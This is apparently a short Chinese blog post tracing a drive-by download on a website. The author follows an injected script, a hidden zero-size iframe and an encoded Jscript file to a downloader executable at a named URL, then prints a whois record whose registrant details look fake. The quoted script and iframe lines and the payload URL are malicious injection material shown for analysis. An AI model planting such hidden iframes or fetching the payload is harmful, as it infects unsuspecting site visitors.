<SCRIPT language=javascript type="text/javascript" src="http://www.ik8.com/jqqonline/bottom1.js"></SCRIPT>
这个代码里有个有趣的东西:
document.write("<iframe width=740s height=100 align=center frameborder=0 scrolling=no src='http://www.ik8.com/jqqonline/bottom1.htm'></iframe>");
继续跟踪:
<iframe src="http://idc.kis163.com/index.html?id=ik8" width="0" height="0" ></iframe>
可疑啊。。。。。。继续:
<SCRIPT language="Jscript.encode" src=link.js></script>
看了link.js,加密的。稍微弄了一下,
找出个好东西:
union.uiiiu.com/soft/sms.exe
哈哈、、、、
一看就不是个好东西。
whois一下uiiiu.com
得:
Domain Name:uiiiu.com
Registrant:
Zhang san
Fujian province,Xiamen City
200030
Administrative Contact:
ZhangSan
Zhang san
Fujian province,Xiamen City
Xiamen Fujian 200030
CN
tel: 101 2345678
fax: 101 2345678
888888@kkk.com
Technical Contact:
ZhangSan
Zhang san
Fujian province,Xiamen City
Xiamen Fujian 200030
CN
tel: 2345678
fax: 2345678
888888@kkk.com
Billing Contact:
ZhangSan
Zhang san
Fujian province,Xiamen City
Xiamen Fujian 200030
CN
tel: 2345678
fax: 2345678
888888@kkk.com
Registration Date: 2007-05-08
Update Date: 2007-05-08
Expiration Date: 2008-05-08
Primary DNS: ns2.xinnetdns.com 210.51.170.48
Secondary DNS: ns2.xinnet.cn 210.51.170.67
张三。。。Orz,不是正人君子。
唉。这个毒自己做了一下小研究,是常见的下载者。。。唉。
7.9更新:今天早上就没了。看来不愧是著名站啊。
没有评论:
发表评论